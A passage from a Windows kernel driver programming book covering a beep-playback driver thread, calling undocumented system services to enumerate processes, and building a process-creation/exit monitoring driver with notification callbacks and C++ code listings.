We loop around based on the Repeat member (which is usually 1). Then the IRP_MJ_DEVICE_CONTROL
IRP is built with IoBuildDeviceIoControlRequest, supplying the frequency to play and the
duration. Then, IoCallDriver is invoked with the Beep device pointer we obtained earlier, and
the IRP. Unfortunately (or futunately, depending on your perspective), the Beep driver just starts the
operation, but does not wait for it to finish. It might (and in fact, always) returns STATUS_PENDING
from the IoCallDriver call, which means the operation is not yet complete (the actual playing has
not yet begun). Since we don’t have anything else to do until then, the doneEvent event provided to
IoBuildDeviceIoControlRequest is signaled automatically by the I/O manager when the operation
completes - so we wait on the event.
Now that the sound is playing, we have to wait for the duration of that note with KeDelayExecution-
Thread:
Chapter 8: Advanced Programming Techniques (Part 1)
252
LARGE_INTEGER delay;
delay.QuadPart = -10000LL * note->Duration;
KeDelayExecutionThread(KernelMode, FALSE, &delay);
Finally, if Repeat is greater than one, then we might need to wait between plays of the same note:
// perform the delay if specified,
// except for the last iteration
//
if (i < count - 1 && note->Delay != 0) {
delay.QuadPart = -10000LL * note->Delay;
KeDelayExecutionThread(KernelMode, FALSE, &delay);
}
}
}
At this point, the note data can be freed (or just returned to the lookaside list) and the code loops back to
wait for the availability of the next note:
ExFreeToPagedLookasideList(&m_lookaside, note);
}
The loop continues until the thread is instructed to stop by signaling stopEvent, at which point it breaks
from the infinite loop and cleans up by dereferecning the file object obtained from IoGetDeviceOb-
jectPointer:
ObDereferenceObject(beepFileObject);
}
Here is the entire thread function for convenience (comments and KdPrint removed):
void PlaybackState::PlayMelody() {
PDEVICE_OBJECT beepDevice;
UNICODE_STRING beepDeviceName = RTL_CONSTANT_STRING(DD_BEEP_DEVICE_NAME_U);
PFILE_OBJECT beepFileObject;
auto status = IoGetDeviceObjectPointer(&beepDeviceName, GENERIC_WRITE,
&beepFileObject, &beepDevice);
if (!NT_SUCCESS(status)) {
return;
}
PVOID objects[] = { &m_counter, &m_stopEvent };
Chapter 8: Advanced Programming Techniques (Part 1)
253
IO_STATUS_BLOCK ioStatus;
BEEP_SET_PARAMETERS params;
for (;;) {
status = KeWaitForMultipleObjects(2, objects, WaitAny, Executive,
KernelMode, FALSE, nullptr, nullptr);
if (status == STATUS_WAIT_1) {
break;
}
PLIST_ENTRY link;
{
Locker locker(m_lock);
link = RemoveHeadList(&m_head);
NT_ASSERT(link != &m_head);
}
auto note = CONTAINING_RECORD(link, FullNote, Link);
if (note->Frequency == 0) {
NT_ASSERT(note->Duration > 0);
LARGE_INTEGER interval;
interval.QuadPart = -10000LL * note->Duration;
KeDelayExecutionThread(KernelMode, FALSE, &interval);
}
else {
params.Duration = note->Duration;
params.Frequency = note->Frequency;
int count = max(1, note->Repeat);
KEVENT doneEvent;
KeInitializeEvent(&doneEvent, SynchronizationEvent, FALSE);
for (int i = 0; i < count; i++) {
auto irp = IoBuildDeviceIoControlRequest(IOCTL_BEEP_SET,
beepDevice, ¶ms, sizeof(params),
nullptr, 0, FALSE, &doneEvent, &ioStatus);
if (!irp) {
break;
}
NT_ASSERT(irp->UserEvent == &doneEvent);
status = IoCallDriver(beepDevice, irp);
if (!NT_SUCCESS(status)) {
break;
Chapter 8: Advanced Programming Techniques (Part 1)
254
}
if (status == STATUS_PENDING) {
KeWaitForSingleObject(&doneEvent, Executive,
KernelMode, FALSE, nullptr);
}
LARGE_INTEGER delay;
delay.QuadPart = -10000LL * note->Duration;
KeDelayExecutionThread(KernelMode, FALSE, &delay);
if (i < count - 1 && note->Delay != 0) {
delay.QuadPart = -10000LL * note->Delay;
KeDelayExecutionThread(KernelMode, FALSE, &delay);
}
}
}
ExFreeToPagedLookasideList(&m_lookaside, note);
}
ObDereferenceObject(beepFileObject);
}
The last piece of the puzzle is the PlaybackState::Stop method that signals the thread to exit:
void PlaybackState::Stop() {
if (m_hThread) {
//
// signal the thread to stop
//
KeSetEvent(&m_stopEvent, 2, FALSE);
//
// wait for the thread to exit
//
PVOID thread;
auto status = ObReferenceObjectByHandle(m_hThread, SYNCHRONIZE,
*PsThreadType, KernelMode, &thread, nullptr);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX "ObReferenceObjectByHandle error (0x%X)\n",
status));
}
else {
KeWaitForSingleObject(thread, Executive, KernelMode, FALSE, nullptr\
);
Chapter 8: Advanced Programming Techniques (Part 1)
255
ObDereferenceObject(thread);
}
ZwClose(m_hThread);
m_hThread = nullptr;
}
}
If the thread exists (m_hThread is non-NULL), then we set the event (KeSerEvent). Then we wait for
the thread to actually terminate. This is technically unnecessary because the thread was created with
IoCreateSystemThread, so there is no danger the driver is unloaded prematurely. Still, it’s worthwhile
showing how to get the pointer to the thread object given a handle (since KeWaitForSingleObject
requires an object). It’s important to remember to call ObDereferenceObject once we don’t need the
pointer anymore, or the thread object will remain alive forever (keeping its process and other resources
alive as well).
Client Code
Here are some examples for invokign the driver (error handling ommitted):
#include <Windows.h>
#include <stdio.h>
#include "..\KMelody\MelodyPublic.h"
int main() {
HANDLE hDevice = CreateFile(MELODY_SYMLINK, GENERIC_WRITE, 0,
nullptr, OPEN_EXISTING, 0, nullptr);
Note notes[10];
for (int i = 0; i < _countof(notes); i++) {
notes[i].Frequency = 400 + i * 30;
notes[i].Duration = 500;
}
DWORD bytes;
DeviceIoControl(hDevice, IOCTL_MELODY_PLAY, notes, sizeof(notes),
nullptr, 0, &bytes, nullptr);
for (int i = 0; i < _countof(notes); i++) {
notes[i].Frequency = 1200 - i * 100;
notes[i].Duration = 300;
notes[i].Repeat = 2;
notes[i].Delay = 300;
}
DeviceIoControl(hDevice, IOCTL_MELODY_PLAY, notes, sizeof(notes),
Chapter 8: Advanced Programming Techniques (Part 1)
256
nullptr, 0, &bytes, nullptr);
CloseHandle(hDevice);
return 0;
}
I recommend you build the driver and the client and test them. The project names are KMelody and
Melody in the solution for this chapter. Build your own music!
1. Replace the call to IoCreateSystemThread with PsCreateSystemThread and
make the necessary adjustments.
2. Replace the lookaside list API with the newer API.
Invoking System Services
System Services (system calls) are normally invoked indirectly from user mode code. For example, calling
the Windows CreateFile API in user mode invokes NtCreateFile from NtDll.Dll, which is a
system call. This call traverses the user/kernel boundary, eventually calling the “real” NtCreateFile
implementation within the executive.
We already know that drivers can invoke system calls as well, using the Nt or the Zw variant (which sets
the previous execution mode to KernelMode before invoking the system call). Some of these system calls
are fully documented in the driver kit, such as NtCreateFile/ZwCreateFile. Others, however, are not
documented or sometimes partially documented.
For example, enumerating processes in the system is fairly easy to do from user-mode - in fact, there are
several APIs one can use for this purpose. They all invoke the NtQuerySystemInformation system
call, which is not officially documented in the WDK. Ironically, it’s provided in the user-mode header
Winternl.h like so:
NTSTATUS NtQuerySystemInformation (
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL);
Chapter 8: Advanced Programming Techniques (Part 1)
257
The macros IN and OUT expand to nothing. These were used in the old days before SAL was invented to
provide some semantics for developers. For some reason, Winternl.h uses these macros rather than the
modern SAL annotations.
We can copy this definition and tweak it a bit by turning it into its Zw variant, more suitable for kernel
callers. The SYSTEM_INFORMATION_CLASS enumeration and associated data structures are the real data
we’re after. Some values are provided in user-mode and/or kernel-mode headers. Most of the values have
been “reversed engineered” and can be found in open source projects, such as Process Hacker². Although
these APIs might not be officially documnented, they are unlikely to change as Microsoft’s own tools
depend on many of them.
If the API question only exists in certain Windows versions, it’s possible to query dynamically for the
existence of a kernel API with MmGetSystemRoutineAddress:
PVOID MmGetSystemRoutineAddress (_In_ PUNICODE_STRING SystemRoutineName);
You can think of MmGetSystemRoutineAddress as the kernel-mode equivalent of the user-mode
GetProcAddress API.
Another very useful API is NtQueryInformationProcess, also defined in Winternl.h:
NTAPI NtQueryInformationProcess (
IN HANDLE ProcessHandle,
IN PROCESSINFOCLASS ProcessInformationClass,
OUT PVOID ProcessInformation,
IN ULONG ProcessInformationLength,
OUT PULONG ReturnLength OPTIONAL);
Curiously enough, the kernel-mode headers provide many of the PROCESSINFOCLASS enumeration
values, along with their associated data structures, but not the definition of this system call itself. Here is
a partial set of values for PROCESSINFOCLASS:
²https://github.com/processhacker/phnt
Chapter 8: Advanced Programming Techniques (Part 1)
258
typedef enum _PROCESSINFOCLASS {
ProcessBasicInformation = 0,
ProcessDebugPort = 7,
ProcessWow64Information = 26,
ProcessImageFileName = 27,
ProcessBreakOnTermination = 29
} PROCESSINFOCLASS;
A more complete list is available in ntddk.h. A full list is available within the Process Hacker
project.
The following example shows how to query the current process image file name. ProcessImageFile-
Name seems to be the way to go, and it expects a UNICODE_STRING as the buffer:
ULONG size = 1024;
auto buffer = ExAllocatePoolWithTag(PagedPool, size, DRIVER_TAG);
auto status = ZwQueryInformationProcess(NtCurrentProcess(),
ProcessImageFileName, buffer, size, nullptr);
if(NT_SUCCESS(status)) {
auto name = (UNICODE_STRING*)buffer;
// do something with name...
}
ExFreePool(buffer);
Example: Enumerating Processes
The EnumProc driver shows how to call ZwQuerySystemInformation to retrieve the list of running
processes. DriverEntry calls the EnumProcess function that does all the work and dumps information
using simple DbgPrint calls. Then DriverEntry returns an error so the driver is unloaded.
First, we need the definition of ZwQuerySystemInformation and the required enum value and
structure which we can copy from Winternl.h:
#include <ntddk.h>
// copied from <WinTernl.h>
enum SYSTEM_INFORMATION_CLASS {
SystemProcessInformation = 5,
};
typedef struct _SYSTEM_PROCESS_INFORMATION {
ULONG NextEntryOffset;
Chapter 8: Advanced Programming Techniques (Part 1)
259
ULONG NumberOfThreads;
UCHAR Reserved1[48];
UNICODE_STRING ImageName;
KPRIORITY BasePriority;
HANDLE UniqueProcessId;
PVOID Reserved2;
ULONG HandleCount;
ULONG SessionId;
PVOID Reserved3;
SIZE_T PeakVirtualSize;
SIZE_T VirtualSize;
ULONG Reserved4;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
PVOID Reserved5;
SIZE_T QuotaPagedPoolUsage;
PVOID Reserved6;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
SIZE_T PrivatePageCount;
LARGE_INTEGER Reserved7[6];
} SYSTEM_PROCESS_INFORMATION, * PSYSTEM_PROCESS_INFORMATION;
extern "C" NTSTATUS ZwQuerySystemInformation(
SYSTEM_INFORMATION_CLASS info,
PVOID buffer,
ULONG size,
PULONG len);
Notice there are lots of “resevred” members in SYSTEM_PROCESS_INFORMATION. We’ll manage with
what we get, but you can find the full data structure in the Process Hacker project.
EnumProc starts by querying the number of bytes needed by calling ZwQuerySystemInformation
with a null buffer and zero size, getting the last parameter as the required size:
void EnumProcesses() {
ULONG size = 0;
ZwQuerySystemInformation(SystemProcessInformation, nullptr, 0, &size);
size += 1 << 12;
// 4KB, just to make sure the next call succeeds
We want to allocate some more in case new processes are created between this call and the next “real” call.
We can write the code in a more robust way and have a loop that queries until the size is large enough,
but the above solution is robust enough for most purposes.
Chapter 8: Advanced Programming Techniques (Part 1)
260
Next, we allocate the required buffer and make the call again, this time with the real buffer:
auto buffer = ExAllocatePoolWithTag(PagedPool, size, 'cprP');
if (!buffer)
return;
if (NT_SUCCESS(ZwQuerySystemInformation(SystemProcessInformation,
buffer, size, nullptr))) {
if the call succeeds, we can start iterating. The returned pointer is to the first process, where the next process
is located NextEntryOffset bytes from this offset. The enumeration ends when NextEntryOffset
is zero:
ULONG count = 0;
for (;;) {
DbgPrint("PID: %u Session: %u Handles: %u Threads: %u Image: %wZ\n",
HandleToULong(info->UniqueProcessId),
info->SessionId, info->HandleCount,
info->NumberOfThreads, info->ImageName);
count++;
if (info->NextEntryOffset == 0)
break;
info = (SYSTEM_PROCESS_INFORMATION*)((PUCHAR)info + info->NextEntryOffset);
}
DbgPrint("Total Processes: %u\n", count);
We output some of the details provided in the SYSTEM_PROCESS_INFORMATION structure and count the
nnumber of processes while we’re at it. The only thing left to do in this simple example is to clean up:
}
ExFreePool(buffer);
}
As mentioned, DriverEntry is simple:
Chapter 8: Advanced Programming Techniques (Part 1)
261
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
UNREFERENCED_PARAMETER(DriverObject);
UNREFERENCED_PARAMETER(RegistryPath);
EnumProcesses();
return STATUS_UNSUCCESSFUL;
}
Given this knowledge, we can make the KMelody driver a bit better by creating our thread in a Csrss.exe
process for the current session, instead of the first client process that comes in. This is better, since Csrss
always exists, and is in fact a critical process - one that if killed for whatever reason, causes the system to
crash.
Killing Csrss is not easy, since it’s a protected process starting with Windows 8.1, but kernel code can
certainly do that.
1. Modify the KMelody driver to create the thread in a Csrss process for the current session.
Search for Csrss with ZwQuerySystemInformation and create the thread in that
process.
2. Add support for multiple sessions, where there is one playback thread per ses-
sion. Hint: call ZwQueryInformationProcess with ProcessSessionId to find
out the session a process is part of. Manage a list of PlaybackState ob-
jects, one for each session. You can also use the undocumented (but exported)
PsGetCurrentProcessSessionId API.
Summary
In this chapter, we were introduced to some programming techniques that are useful in many types of
drivers. We’re not done with these techniques - there will be more in chapter 11. But for now, we can
begin using some kernel-provided notifications, starting with Process and Thread notifications in the next
chapter.
Chapter 9: Process and Thread
Notifications
One of the powerful mechanisms available for kernel drivers is the ability to be notified when certain
important events occur. In this chapter, we’ll look into some of these events, namely process creation and
destruction, thread creation and destruction, and image loads.
In this chapter:
• Process Notifications
• Implementing Process Notifications
• Providing Data to User Mode
• Thread Notifications
• Image Load Notifications
• Remote Thread Detection
Process Notifications
Whenever a process is created or destroyed, interested drivers can be notified by the kernel of that fact.
This allows drivers to keep track of processes, possibly associating some data with these processes. At the
very minimum, these allow drivers to monitor process creation/destruction in real-time. By “real-time”
I mean that the notifications are sent “in-line”, as part of process creation; the driver cannot miss any
processes that may be created and destroyed quickly.
For process creation, drivers also have the power to stop the process from being fully created, returning
an error to the caller that initiated process creation. This kind of power can only be directly achieved in
kernel mode.
Windows provides other mechanisms for being notified when processes are created or destroyed. For
example, using Event Tracing for Windows (ETW), such notifications can be received by a user-mode
process (running with elevated privileges). However, there is no way to prevent a process from being
created. Furthermore, ETW has an inherent notification delay of about 1-3 seconds (it uses internal
buffers for performance reasons), so a short-lived process may exit before the creation notification arrives.
Opening a handle to the created process at that time would no longer be possible.
Chapter 9: Process and Thread Notifications
263
The main API for registering for process notifications is PsSetCreateProcessNotifyRoutineEx,
defined like so:
NTSTATUS PsSetCreateProcessNotifyRoutineEx (
_In_ PCREATE_PROCESS_NOTIFY_ROUTINE_EX NotifyRoutine,
_In_ BOOLEAN Remove);
There is currently a system-wide limit of 64 registrations, so it’s theoretically possible for the
registration function to fail.
The first argument is the driver’s callback routine, having the following prototype:
void ProcessNotifyCallback(
_Inout_
PEPROCESS Process,
_In_
HANDLE ProcessId,
_Inout_opt_ PPS_CREATE_NOTIFY_INFO CreateInfo);
The second argument to PsSetCreateProcessNotifyRoutineEx indicates whether the driver is
registering or unregistering the callback (FALSE indicates the former). Typically, a driver will call this
API with FALSE in its DriverEntry routine and call the same API with TRUE in its Unload routine.
The parameters to the process notification routine are as follows:
• Process - the process object of the newly created process, or the process being destroyed.
• Process Id - the unique process ID of the process. Although it’s declared with type HANDLE, it’s in
fact an ID.
• CreateInfo - a structure that contains detailed information on the process being created. If the process
is being destroyed, this argument is NULL.
For process creation, the driver’s callback routine is executed by the creating thread (running as part of
the creating process). For process exit, the callback is executed by the last thread to exit the process. In
both cases, the callback is called inside a critical region (where normal kernel APCs are disabled).
Starting with Windows 10 version 1607, there is another function for process notifications:PsSetCreateProcessNotify
This “extended” function sets up a callback similar to the previous one, but the callback is also invoked
for Pico processes. Pico processes are those used to host Linux processes for the Windows Subsystem for
Linux (WSL) version 1. If a driver is interested in such processes, it must register with the extended
function.
Chapter 9: Process and Thread Notifications
264
A driver using these callbacks must have the IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY flag
in its Portable Executable (PE) image header. Without it, the call to the registration function returns
STATUS_ACCESS_DENIED (unrelated to driver test signing mode). Currently, Visual Studio does not
provide UI for setting this flag. It must be set in the linker command-line options with /integritycheck.
Figure 9-1 shows the project properties where this setting is specified.
Figure 9-1: /integritycheck linker switch in Visual Studio
The data structure provided for process creation is defined like so:
typedef struct _PS_CREATE_NOTIFY_INFO {
_In_ SIZE_T Size;
union {
_In_ ULONG Flags;
struct {
_In_ ULONG FileOpenNameAvailable : 1;
_In_ ULONG IsSubsystemProcess : 1;
_In_ ULONG Reserved : 30;
};
Chapter 9: Process and Thread Notifications
265
};
_In_ HANDLE ParentProcessId;
_In_ CLIENT_ID CreatingThreadId;
_Inout_ struct _FILE_OBJECT *FileObject;
_In_ PCUNICODE_STRING ImageFileName;
_In_opt_ PCUNICODE_STRING CommandLine;
_Inout_ NTSTATUS CreationStatus;
} PS_CREATE_NOTIFY_INFO, *PPS_CREATE_NOTIFY_INFO;
Here is a description of the important fields in this structure:
• CreatingThreadId - a combination of thread and process Id of the creator of the process.
• ParentProcessId - the parent process ID (not a handle). This process is usually the same as provided
by CreateThreadId.UniqueProcess, but may be different, as it’s possible, as part of process
creation, to pass in a different parent process to inherit certain properties from. See the user-mode
documentation for UpdateProcThreadAttribute with the PROC_THREAD_ATTRIBUTE_PAR-
ENT_PROCESS attribute.
• ImageFileName - the image file name of the executable, available if the flag FileOpenNameAvail-
able is set.
• CommandLine - the full command line used to create the process. Note that in some cases it may
be NULL.
• IsSubsystemProcess - this flag is set if this process is a Pico process. This can only happen if the
driver registered using PsSetCreateProcessNotifyRoutineEx2.
• CreationStatus - this is the status that would return to the caller. It’s set to STATUS_SUCCESS when
the callback is invoked. This is where the driver can stop the process from being created by placing
some failure status in this member (e.g. STATUS_ACCESS_DENIED). if the driver fails the creation,
subsequent drivers that may have set up their own callbacks will not be called.
Implementing Process Notifications
To demonstrate process notifications, we’ll build a driver that gathers information on process creation
and destruction and allow this information to be consumed by a user-mode client. This is similar to tools
such as Process Monitor and SysMon from Sysinternals, which use process and thread notifications for
reporting process and thread activity. During the course of implementing this driver, we’ll leverage some
of the techniques we learned in previous chapters.
Our driver name is going to be SysMon (unrelated to the SysMon tool). It will store all process
creation/destruction information in a linked list. Since this linked list may be accessed concurrently by
multiple threads, we need to protect it with a mutex or a fast mutex; we’ll go with fast mutex, as it’s
slightly more efficient.
The data we gather will eventually find its way to user mode, so we should declare common structures
that the driver produces and a user-mode client consumes. We’ll add a common header file named
SysMonPublic.h to the driver project and define a few structures. We start with a common header for
all information structures we need to collect:
Chapter 9: Process and Thread Notifications
266
enum class ItemType : short {
None,
ProcessCreate,
ProcessExit
};
struct ItemHeader {
ItemType Type;
USHORT Size;
LARGE_INTEGER Time;
};
The ItemType enum defined above uses the C++ 11 scoped enum feature, where enum values
have a scope (ItemType in this case). These enums can also have a non-int size - short in
the example. If you’re using C, you can use classic enums, or even #defines if you prefer.
The ItemHeader structure holds information common to all event types: the type of the event, the time
of the event (expressed as a 64-bit integer), and the size of the payload. The size is important, as each event
has its own information. If we later wish to pack an array of these events and (say) provide them to a
user-mode client, the client needs to know where each event ends and the next one begins.
Once we have this common header, we can derive other data structures for particular events. Let’s start
with the simplest - process exit:
struct ProcessExitInfo : ItemHeader {
ULONG ProcessId;
ULONG ExitCode;
};
For process exit event, there is just one interesting piece of information (besides the header and the thread
ID) - the exit status (code) of the process. This is normally the value returned from a user-mode main
function.
If you’re using C, then inheritance is not available to you. However, you can simulate it by
having the first member be of type ItemHeader and then adding the specific members; The
memory layout is the same.
struct ProcessExitInfo {
ItemHeader Header;
ULONG ProcessId;
};
Chapter 9: Process and Thread Notifications
267
The type used for a process ID is ULONG - process IDs (and thread IDs) cannot be larger than 32-bit.
HANDLE is not a good idea, as user mode may be confused by it. Also, HANDLE has a different size in a
32-bit process as opposed to a 64-bit process, so it’s best to avoid “bitness”-affected members. If you’re
familiar with user-mode programming, DWORD is a common typedef for a 32-bit unsigned integer. It’s
not used here because DWORD is not defined in the WDK headers. Although it’s pretty easy to define it
explicitly, it’s simpler just to use ULONG, which means the same thing and is defined in user-mode and
kernel-mode headers.
Since we need to store every such structure as part of a linked list, each data structure must contain a
LIST_ENTRY instance that points to the next and previous items. Since these LIST_ENTRY objects should
not be exposed to user-mode, we will define extended structures containing these entries in a different file,
that is not shared with user-mode.
There are several ways to define a “bigger” structure to hold the LIST_ENTRY. One way is to create
templated type that has a LIST_ENTRY at the beginning (or end) like so:
template<typename T>
struct FullItem {
LIST_ENTRY Entry;
T Data;
};
The layout of FullItem<T> is shown in figure 9-2.
Figure 9-2: FullItem<T> layout
A templated class is used to avoid creating a multitude of types, one for each specific event type. For
example, we could create the following structure specifically for a process exit event:
Chapter 9: Process and Thread Notifications
268
struct FullProcessExitInfo {
LIST_ENTRY Entry;
ProcessExitInfo Data;
};
We could even inherit from LIST_ENTRY and then just add the ProcessExitInfo structure. But this
is not elegant, as our data has nothing to do with LIST_ENTRY, so inheriting from it is artificial and
should be avoided.
The FullItem<T> type saves the hassle of creating these individual types.
IF you’re using C, then templates are not available, and you must use the above structure
approach. I’m not going to mention C again in this chapter - there is always a workaround that
can be used if you have to.
Another way to accomplish something similar, without using templates is by using a union to hold on to
all the possible variants. For example:
struct ItemData : ItemHeader {
union {
ProcessCreateInfo ProcessCreate;
// TBD
ProcessExitInfo ProcessExit;
};
};
Then we just extend the list of data members in the union. The full item would be just a simple extension:
struct FullItem {
LIST_ENTRY Entry;
ItemData Data;
};
The rest of the code uses the first option (with the template). The reader is encouraged to try the second
option.
The head of our linked list must be stored somewhere. We’ll create a data structure that will hold all
the global state of the driver, instead of creating separate global variables. Here is the definition of our
structure (in Globals.h in the smaple code for this chapter):
Chapter 9: Process and Thread Notifications
269
#include "FastMutex.h"
struct Globals {
void Init(ULONG maxItems);
bool AddItem(LIST_ENTRY* entry);
LIST_ENTRY* RemoveItem();
private:
LIST_ENTRY m_ItemsHead;
ULONG m_Count;
ULONG m_MaxCount;
FastMutex m_Lock;
};
The FastMutex type used is the same one we developed in chapter 6.
Init is used to initialize the data members of the structure. Here is its implementation (in Globals.cpp):
void Globals::Init(ULONG maxCount) {
InitializeListHead(&m_ItemsHead);
m_Lock.Init();
m_Count = 0;
m_MaxCount = maxCount;
}
m_MaxCount holds the maximum number of elements in the linked list. This will be used to prevent
the list from growing arbitrarily large if a client does not request data for a while. m_Count holds the
current number of items in the list. The list itself is initialized with the normal InitializeListHead
API. Finally, the fast mutex is initialized by invoking its own Init method as implemented in chapter 6.
The DriverEntry Routine
The DriverEntry for the SysMon driver is similar to the one in the Zero driver from chapter 7. We have
to add process notification registration and proper initialization of our Globals object:
// in SysMon.cpp
Globals g_State;
extern "C"
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING) {
auto status = STATUS_SUCCESS;
PDEVICE_OBJECT DeviceObject = nullptr;
UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\sysmon");
Chapter 9: Process and Thread Notifications
270
bool symLinkCreated = false;
do {
UNICODE_STRING devName = RTL_CONSTANT_STRING(L"\\Device\\sysmon");
status = IoCreateDevice(DriverObject, 0, &devName,
FILE_DEVICE_UNKNOWN, 0, TRUE, &DeviceObject);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX "failed to create device (0x%08X)\n",
status));
break;
}
DeviceObject->Flags |= DO_DIRECT_IO;
status = IoCreateSymbolicLink(&symLink, &devName);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX "failed to create sym link (0x%08X)\n",
status));
break;
}
symLinkCreated = true;
status = PsSetCreateProcessNotifyRoutineEx(OnProcessNotify, FALSE);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX
"failed to register process callback (0x%08X)\n",
status));
break;
}
} while (false);
if (!NT_SUCCESS(status)) {
if (symLinkCreated)
IoDeleteSymbolicLink(&symLink);
if (DeviceObject)
IoDeleteDevice(DeviceObject);
return status;
}
g_State.Init(10000);
// hard-coded limit for now
DriverObject->DriverUnload = SysMonUnload;
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] = SysMonCreateClose;
Chapter 9: Process and Thread Notifications
271
DriverObject->MajorFunction[IRP_MJ_READ] = SysMonRead;
return status;
}
The device object’s flags are adjusted to use Direct I/O for read/write operations (DO_DIRECT_IO). The
device is created as exclusive, so that only a single client can exist to the device. This makes sense, otherwise
multiple clients might be getting data from the device, which would mean each client getting parts of the
data. In this case, I decided to prevent that by creating the device as exclusive (TRUE value in the second
to last argument). We’ll use the read dispatch routine to return event information to a client.
The create and close dispatch routines are handled in the simplest possible way - just completing them
successfully, with the help of CompleteRequest we have encountered before:
NTSTATUS CompleteRequest(PIRP Irp,
NTSTATUS status = STATUS_SUCCESS, ULONG_PTR info = 0) {
Irp->IoStatus.Status = status;
Irp->IoStatus.Information = info;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
NTSTATUS SysMonCreateClose(PDEVICE_OBJECT, PIRP Irp) {
return CompleteRequest(Irp);
}
Handling Process Exit Notifications
The process notification function in the code above is OnProcessNotify and has the prototype outlined
earlier in this chapter. This callback handles process creation and exit. Let’s start with process exit, as it’s
much simpler than process creation (as we shall soon see). The basic outline of the callback is as follows:
void OnProcessNotify(PEPROCESS Process, HANDLE ProcessId,
PPS_CREATE_NOTIFY_INFO CreateInfo) {
if (CreateInfo) {
// process create
}
else {
// process exit
}
}
For process exit we have just the process ID we need to save, along with the header data common to all
events. First, we need to allocate storage for the full item representing this event:
Chapter 9: Process and Thread Notifications
272
auto info = (FullItem<ProcessExitInfo>*)ExAllocatePoolWithTag(PagedPool,
sizeof(FullItem<ProcessExitInfo>), DRIVER_TAG);
if (info == nullptr) {
KdPrint((DRIVER_PREFIX "failed allocation\n"));
return;
}
If the allocation fails, there is really nothing the driver can do, so it just returns from the callback.
Now it’s time to fill the generic information: time, item type and size, all of which are easy to get:
auto& item = info->Data;
KeQuerySystemTimePrecise(&item.Time);
item.Type = ItemType::ProcessExit;
item.Size = sizeof(ProcessExitInfo);
item.ProcessId = HandleToULong(ProcessId);
item.ExitCode = PsGetProcessExitStatus(Process);
PushItem(&info->Entry);
First, we dig into the data item itself (bypassing the LIST_ENTRY) with the item variable. Next, we
fill the header information: The item type is well-known, since we are in the branch handling a process
exit notification; the time can be obtained with KeQuerySystemTimePrecise that returns the current
system time (UTC, not local time) as a 64-bit integer counting from January 1, 1601 at midnight Universal
Time. Finally, the item size is constant and is the size of the user-facing data structure (not the size of the
FullItem<ProcessExitInfo>).
Notice the item variable is a reference to the data; without the reference (&), a copy would
have been created, which is not what we want.
The KeQuerySystemTimePrecise API is available starting with Windows 8. For earlier
versions, the KeQuerySystemTime API should be used instead.
The specific data for a process exit event consists of the process ID and the exit code. The process ID is
provided directly by the callback itself. The only thing to do is call HandleToULong so the correct cast
is used to turn a HANDLE value into an unsigned 32-bit integer. The exit code is not given directly, but it’s
easy to retrieve with PsGetProcessExitStatus:
NTSTATUS PsGetProcessExitStatus(_In_ PEPROCESS Process);
All that’s left to do now is add the new item to the end of our linked list. For this purpose, we’ll define and
implement a function named AddItem in the Globals class:
Chapter 9: Process and Thread Notifications
273
void Globals::AddItem(LIST_ENTRY* entry) {
Locker locker(m_Lock);
if (m_Count == m_MaxCount) {
auto head = RemoveHeadList(&m_ItemsHead);
ExFreePool(CONTAINING_RECORD(head,
FullItem<ItemHeader>, Entry));
m_Count--;
}
InsertTailList(&m_ItemsHead, entry);
m_Count++;
}
AddItem uses the Locker<T> we saw in earlier chapters to acquire the fast mutex (and release it when
the variable goes out of scope) before manipulating the linked list. Remember to set the C++ standard to
C++ 17 at least in the project’s properties so that Locker can be used without explicitly specifying the
type it works on (the compiler makes the inference).
We’ll add new items to the tail of the list. If the number of items in the list is at its maximum, the function
removes the first item (from the head) and frees it with ExFreePool, decrementing the item count.
This is not the only way to handle the case where the number of items is too large. Feel free to use other
ways. A more “precise” way might be tracking the number of bytes used, rather than number of items,
because each item is different in size.
We don’t need to use atomic increment/decrement operations in the AddItem function because
manipulation of the item count is always done under the protection of the fast mutex.
With AddItem implemented, we can call it from our process notify routine:
g_State.AddItem(&info->Entry);
Implement the limit by reading from the registry in DriverEntry. Hint: you can use APIs
such as ZwOpenKey or IoOpenDeviceRegistryKey and then ZwQueryValueKey. We’ll
look at these APIs more closely in chapter 11.
Chapter 9: Process and Thread Notifications
274
Handling Process Create Notifications
Process create notifications are more complex because the amount of information varies. The command
line length is different for different processes. First we need to decide what information to store for process
creation. Here is a first try:
struct ProcessCreateInfo : ItemHeader {
ULONG ProcessId;
ULONG ParentProcessId;
WCHAR CommandLine[1024];
};
We choose to store the process ID, the parent process ID and the command line. Although this structure
can work and is fairly easy to deal with because its size is known in advance.
What might be an issue with the above declaration?
The potential issue here is with the command line. Declaring the command line with constant size is simple,
but not ideal. If the command line is longer than allocated, the driver would have to trim it, possibly hiding
important information. If the command line is shorter than the defined limit, the structure is wasting
memory.
Can we use something like this?
struct ProcessCreateInfo : ItemHeader {
ULONG ProcessId;
ULONG ParentProcessId;
UNICODE_STRING CommandLine;
// can this work?
};
This cannot work. First, UNICODE_STRING is not normally defined in user mode headers. Secondly
(and much worse), the internal pointer to the actual characters normally would point to system space,
inaccessible to user-mode. Thirdly, how would that string be eventually freed?
Here is another option, which we’ll use in our driver:
Chapter 9: Process and Thread Notifications
275
struct ProcessCreateInfo : ItemHeader {
ULONG ProcessId;
ULONG ParentProcessId;
ULONG CreatingThreadId;
ULONG CreatingProcessId;
USHORT CommandLineLength;
WCHAR CommandLine[1];
};
We’ll store the command line length and copy the actual characters at the end of the structure, starting
from CommandLine. The array size is specified as 1 just to make it easier to work with in the code. The
actual number of characters is provided by CommandLineLength.
